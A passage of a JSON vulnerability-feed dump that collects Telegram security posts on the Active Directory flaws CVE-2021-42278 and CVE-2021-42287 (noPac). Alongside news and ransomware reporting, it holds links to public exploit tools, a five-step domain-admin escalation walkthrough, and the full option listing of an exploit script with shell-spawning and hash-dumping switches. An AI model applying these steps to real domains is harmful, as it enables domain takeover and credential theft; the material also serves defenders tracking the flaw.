\u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T10:15:44.000000Z"}, {"uuid": "dc763972-e8b6-4012-a2fd-083d2ae11605", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1040", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython implementation for CVE-2021-42278 (Active Directory Privilege Escalation)\nURL\uff1ahttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-13T23:18:13.000000Z"}, {"uuid": "63963022-fb3b-49aa-907d-ac6abe49160f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/secmedia/81", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft 
\u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 ( CVE-2021-42287 \u0438 CVE-2021-42278 ) \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 Active Directory, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows.", "creation_timestamp": "2021-12-22T14:51:36.000000Z"}, {"uuid": "d1350c97-8665-4fc7-9945-fa3f7878f01d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/itsec_news/5413", "content": "\u200b\u26a1\ufe0f600 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430 \u0433\u043e\u0434: RansomHub \u2013 \u043d\u043e\u0432\u044b\u0439 \u043b\u0438\u0434\u0435\u0440 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\n\n\ud83d\udcac \u0412 2024 \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0435 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 
\u0438\u0433\u0440\u043e\u043a \u2014 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 RansomHub, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043f\u0435\u043b\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 600 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Group-IB, \u0433\u0440\u0443\u043f\u043f\u0430 RansomHub \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u043d\u0438\u0448\u0443 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0439 \u0432 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ALPHV \u0438 LockBit .\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e RansomHub \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 ransomware-as-a-service (RaaS), \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u044f \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u043e\u0432 \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a RAMP. 
The main strategy became poaching hackers who had previously worked for other groups, which allowed RansomHub to scale up its attacks quickly.\n\nAnalysis of the malware code showed that the group probably acquired its software from Knight (Cyclops), another well-known cybercriminal organization. 
Using ready-made solutions sped up the deployment of attacks, and the program's multi-platform design lets it encrypt systems on Windows, ESXi, Linux and FreeBSD, widening the list of potential victims.\n\nRansomHub stands out for its high degree of organization. 
The group uses both proven intrusion techniques, such as attacks on VPN services and password guessing, and sophisticated methods, including exploitation of zero-day vulnerabilities. The attackers' arsenal includes tools like PCHunter that let them bypass security controls.\n\nTheir attack tactics include careful reconnaissance of the victim's network and seizure of the most valuable data. 
The operators penetrate the infrastructure, gain control over critical nodes (file storage, backups, servers) and transfer confidential information to remote servers. 
To transfer the information the criminals use Filezilla, and then they start the encryption process on the compromised hosts.\n\nAfter the attack is complete, RansomHub blackmails the victim, demanding a ransom for decryption and for not publishing the data. 
The ransomware is able to stop virtual machines, destroy shadow copies of files and wipe event logs, complicating investigation of the incident.\n\nOne of RansomHub's most destructive attacks was an operation carried out in just 14 hours. 
The criminals used a vulnerability in a Palo Alto firewall (CVE-2024-3400) for initial access, then brute-forced VPN client credentials. After that the attackers exploited old Windows flaws (CVE-2021-42278 and CVE-2020-1472), gaining full control over the network.\n\nExperts stress that such effective RansomHub activity became possible because of untimely operating system updates. 
If a company falls victim to an attack through a vulnerability that was closed several years ago, the blame lies solely with its own negligent attitude to cybersecurity. In such a case it is foolish to shift responsibility onto software vendors.\n\nRansomHub's growing activity testifies to the continuing evolution of cyber threats. 
Organizations must strengthen their defenses, update software regularly and minimize their attack surface so as not to end up on the victim list of RansomHub and other extortion groups.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-02-17T08:21:47.000000Z"}, {"uuid": "17abb29c-6f99-4c01-a06c-9708d84e788d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1110", "content": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user. Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).\n\nUsage: SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain\n\npositional arguments:\n  [domain/]username[:password]\n                        Account used to authenticate to DC.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --impersonate IMPERSONATE\n                        target username that will be impersonated (thru S4U2Self) for querying the ST. 
Keep in mind this will only work if the identity provided in this script is allowed for delegation to the SPN specified\n  -domain-netbios NETBIOSNAME\n                        Domain NetBIOS name. Required if the DC has multiple domains.\n  -target-name NEWNAME  Target computer name, if not specified, will be randomly generated.\n  -new-pass PASSWORD    Add new computer password, if not specified, will be randomly generated.\n  -old-pass PASSWORD    Target computer password, use if you know the password of the target you input with -target-name.\n  -old-hash LMHASH:NTHASH\n                        Target computer hashes, use if you know the hash of the target you input with -target-name.\n  -debug                Turn DEBUG output ON\n  -ts                   Adds timestamp to every logging output\n  -shell                Drop a shell via smbexec\n  -no-add               Forcibly change the password of the target computer.\n  -create-child         Current account has permission to CreateChild.\n  -dump                 Dump hashes via secretsdump\n  -use-ldap             Use LDAP instead of LDAPS\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)\n  -dc-host hostname     Hostname of the domain controller to use. 
If omitted, the domain part (FQDN) specified in the account parameter will be used\n  -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN specified in the account parameter.\n\nexecute options:\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)\n  -share SHARE          share where the output will be grabbed from (default ADMIN$)\n  -shell-type {cmd,powershell}\n                        choose a command processor for the semi-interactive shell\n  -codec CODEC          Sets encoding used (codec) from the target's output (default \"GBK\").\n  -service-name service_name\n                        The name of the service used to trigger the payload\n\ndump options:\n  -just-dc-user USERNAME\n                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch\n  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)\n  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)\n  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. 
Doesn't apply to -outputfile data\n  -user-status          Display whether or not the user is disabled\n  -history              Dump password history, and LSA secrets OldVal\n  -resumefile RESUMEFILE", "creation_timestamp": "2022-09-06T14:17:32.000000Z"}, {"uuid": "4ef15f42-f61a-4320-9e0e-da9d28a10d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1108", "content": "noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User\nhttp://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html", "creation_timestamp": "2022-09-06T14:17:31.000000Z"}, {"uuid": "8cee49e5-cf58-4e39-bc5c-036ed02ebfda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/270", "content": "CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user\n\nScanner and exploit in C#:\nhttps://github.com/cube0x0/noPac\n\nPython exploit for kali: https://github.com/WazeHell/sam-the-admin\n\n@dnevnik_infosec", "creation_timestamp": "2021-12-18T15:24:11.000000Z"}, {"uuid": "cec70a97-66ce-48db-82ee-e71b83a5e589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1578", "content": "NoPacScan\nThis is a scanner for CVE-2021-42287/CVE-2021-42278; it scans more domain controllers 
than the original script, and it is more accurate. It finds DCs with a DNS lookup of _msdcs.aaa.com, which is better than LDAP and SAMR, and it will automatically scan all the DCs we find. If you use LDAP or SAMR, you may miss some DCs that have been removed from the Primary DC. 
For greater accuracy, it scans the PAC for an entry whose type is 0x10, which is the core of Microsoft's patch for this vulnerability.\nhttps://github.com/knightswd/NoPacScan\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-05-19T07:01:56.000000Z"}, {"uuid": "3e9a8a2b-69c3-417b-a9f0-7bbfb8d39c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2147", "content": "sAMAccountName spoofing: from LowPriv to domain admin in six commands\nResearcher Charlie Clark (@exploitph, known for his PowerView fork) published a fresh method of privilege escalation in an Active Directory domain, based on 
exploitation of CVE-2021-42287 and CVE-2021-42278. The batch of CVEs related to these vulnerabilities has been circulating on Twitter for about a month and was promptly fixed by Microsoft as part of the November Patch Tuesday. But, as the saying goes, you snooze, you lose, so Acrono and I got domain admin anyway. 
Next I will tell (and show) how it is done, but first a bit of theory.\n\u25b6\ufe0f Source\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-07T11:55:48.000000Z"}, {"uuid": "ac23cdec-d17a-4c70-8c23-a41d51927875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/54", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\nThis escalation method has existed for almost two years, but it is still relevant and interesting. Which components does it involve?\n\n1. 
By default, an ordinary domain user can join a computer to AD only 10 times. \nTo check this, you can run the following command:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\nTo distinguish user accounts from computer accounts, computer accounts must have a $ at the end of their sAMAccountName attribute. The catch, however, is that this character is not always checked. 
The name attribute of a computer account is sAMAccountName. This attribute can be viewed and edited manually with the ADSIEdit tool.\n\n2. When requesting a service ticket, a TGT must first be presented. If the KDC does not find the requested ticket, it automatically performs a second lookup with a trailing $. 
If a TGT was obtained for username, and the user username was then deleted, using that TGT to request a service ticket for another user via S4U2self causes the KDC to look up username$ in AD. \n\nCombining these vulns, we get roughly the following scenario\n\nThe user requests a TGT. Then the user can try to delete or rename the original computer account. 
Having obtained the TGT, the user can start exploiting sAMAccountName. And knowing full well that the KDC issues tickets and temporary session keys to users and computers in the domain, we can use this for privilege escalation\n\nThe exploitation scenario looks like this:\n\n1. A new computer account is added to the domain.\n2. 
The created computer account is renamed to match the name of an existing domain controller\n3. A Kerberos TGT is requested using the renamed computer account name.\n4. The created computer account name is renamed back to its original value.\n5. 
A Kerberos service ticket is requested using the S4U2self extension\n\nSounds tedious, but luckily there is noPac, which exploits this problem\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T11:56:00.000000Z"}, {"uuid": "b4016466-e2aa-4dbd-8e67-dc17fe7536f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/bizone_channel/425", "content": "Cybersecure jingle bells. December news roundup\ud83c\udf84\n\nPerhaps the loudest news item of the month was the Log4Shell vulnerability. 
\u041c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043e \u043d\u0435\u0439, \u043a\u043e\u0433\u0434\u0430 \u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u0432\u043e\u0438\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u0445\u043e\u0442\u0438\u043c \u043e\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0432\u043b\u0435\u043a\u043b\u043e \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0430. \n\n\ud83d\udd10Log4Shell \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Intel, NVIDIA \u0438 Microsoft \u2014 \u0432\u0441\u0435 \u043e\u043d\u0438 \u043f\u043e\u0432\u0441\u0435\u043c\u0435\u0441\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0431\u0438\u0437\u043d\u0435\u0441\u0435. \u0414\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0430\u044f \u0431\u0440\u0435\u0448\u044c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0439 \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0436\u0438\u043b\u043e\u0439. 
\u0422\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Check Point, \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 60, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043e 100 \u0430\u0442\u0430\u043a \u0432 \u043c\u0438\u043d\u0443\u0442\u0443. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0441\u0432\u0435\u0436\u0438\u0439 \u0431\u0430\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u043e\u0432 \u2014 Conti.\n\n\ud83d\udda5Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445: CVE-2021-42287 \u0438 CVE-2021-42278, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows. 
\u042d\u0442\u043e \u0434\u0430\u0435\u0442 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0447\u0442\u0438 \u0431\u0435\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0438.\n\n\ud83d\udea8Google \u043f\u043e\u0434\u0430\u043b\u0430 \u0432 \u0441\u0443\u0434 \u043d\u0430 \u0434\u0432\u0443\u0445 \u0440\u043e\u0441\u0441\u0438\u044f\u043d \u0437\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Glupteba, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0440\u0430\u0437\u0438\u043b \u0431\u043e\u043b\u0435\u0435 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043d\u0430 \u041e\u0421 Windows. \n\n\ud83c\udfaf\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u043e\u043c Kronos \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0435 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0432\u0435\u043b\u0430 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0435\u0433\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b.\n\n\ud83d\udc41\u0412\u043b\u0430\u0441\u0442\u0438 \u041f\u043e\u043b\u044c\u0448\u0438 \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 
\u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0433\u043e \u041f\u041e Pegasus \u0434\u043b\u044f \u0441\u043b\u0435\u0436\u043a\u0438 \u0437\u0430 \u043e\u043f\u043f\u043e\u0437\u0438\u0446\u0438\u0435\u0439. \u0412\u0438\u0434\u0438\u043c\u043e, \u0434\u0430\u0436\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0435\u043d\u0438\u0439 \u043d\u0435 \u043c\u0435\u0448\u0430\u0435\u0442 NSO Group \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c.\n\n\ud83d\udd78\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 LastPass \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0439\u0442\u0438 \u0432 \u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0441 \u043c\u0430\u0441\u0442\u0435\u0440-\u043f\u0430\u0440\u043e\u043b\u0435\u043c. 
\u042d\u0442\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0438 \u0432 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432.\n\n\u0412\u043e\u0432\u0440\u0435\u043c\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435 \u041f\u041e \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0438 \u0431\u0443\u0434\u044c\u0442\u0435 \u043d\u0430\u0447\u0435\u043a\u0443!\n\n#securitynews", "creation_timestamp": "2021-12-29T10:52:54.000000Z"}, {"uuid": "873c0e90-a8dc-46ef-80b1-5e15d3e24ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/poxek/314", "content": "#news Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287 \u0438 CVE-2021-42278, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 
